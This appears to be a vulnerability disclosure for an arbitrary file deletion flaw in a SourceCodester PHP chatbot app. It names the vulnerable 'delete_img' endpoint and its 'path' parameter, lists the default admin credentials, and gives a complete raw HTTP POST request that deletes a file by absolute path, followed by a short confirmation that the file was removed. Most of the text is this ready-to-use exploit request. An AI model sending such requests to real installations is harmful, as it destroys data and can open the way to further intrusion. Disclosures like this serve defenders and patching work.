vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html
Vulnerability File: /simple_chat_bot/classes/Master.php?f=delete_img
Vulnerability location: /simple_chat_bot/classes/Master.php?f=delete_img, path
The password for the backend login account is: admin/admin123
Payload:
Here we delete the shell.php file in the root directory
POST /simple_chat_bot/classes/Master.php?f=delete_img HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/simple_chat_bot/admin/?page=system_info
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
path=C%3A%2Fxampp%2Fhtdocs%2Fsimple_chat_bot%2Fshell.phpThe file path needs to be encoded by url
Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website
The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.
By this time, shell.php has been deleted.



